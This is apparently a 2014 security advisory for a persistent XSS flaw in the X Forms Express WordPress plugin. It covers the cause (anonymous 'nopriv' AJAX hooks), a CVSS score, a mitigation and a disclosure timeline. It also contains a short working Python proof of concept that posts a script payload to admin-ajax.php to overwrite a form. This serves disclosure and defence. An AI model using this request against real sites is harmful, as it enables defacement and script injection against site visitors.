X Forms Express 2.1.0, Persistent XSS
Due to exposing two AJAX functions to anonymous users by using the ‘nopriv’ method of adding AJAX actions, anonymous users are able to insert new forms, and edit the content of existing forms. Utilizing either of these methods can result in a Persistent XSS attack, defacement of website content, or injection of malicious scripts / iframes.
Homepage
https://wordpress.org/plugins/x-forms-express/
CVSS Score
4
CSSS Vector
(AV:N/AC:L/Au:S/C:P/I:N/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Remove the two vulnerable AJAX definitions in the ‘includes/Core/class.db.php’ file, specifically ‘wp_ajax_nopriv_do_insert’ and ‘wp_ajax_nopriv_do_edit’. Inadequate response from vendor – would advise against using this plugin
Proof of Concept
The following Python script will update the content of the form with the ID of 1 to contain the content specified in the “form_fields” payload field.
import requests
url = 'http://localhost/wp-admin/admin-ajax.php'
payload = {
"action":"do_edit",
"table":"wap_x_forms",
"edit_Id":1,
"form_fields":"<script>alert('.');</script>"}
r = requests.post(url, data=payload)Timeline
- 2014-09-19: Discovered
- 2014-09-19: Reported to vendor:
- 2014-09-19: CVE requested
- 2014-09-22: CVE assigned
- 2014-09-22: Update requested from vendor
- 2014-09-29: Update requested from vendor
- 2014-10-02: Response received from vendor requesting more information – link to report provided
- 2014-10-06: Update requested from vendor
- 2014-10-07: Response received from vendor – fresh link provided
- 2014-10-19: Update requested from vendor
- 2014-10-21: Advisory released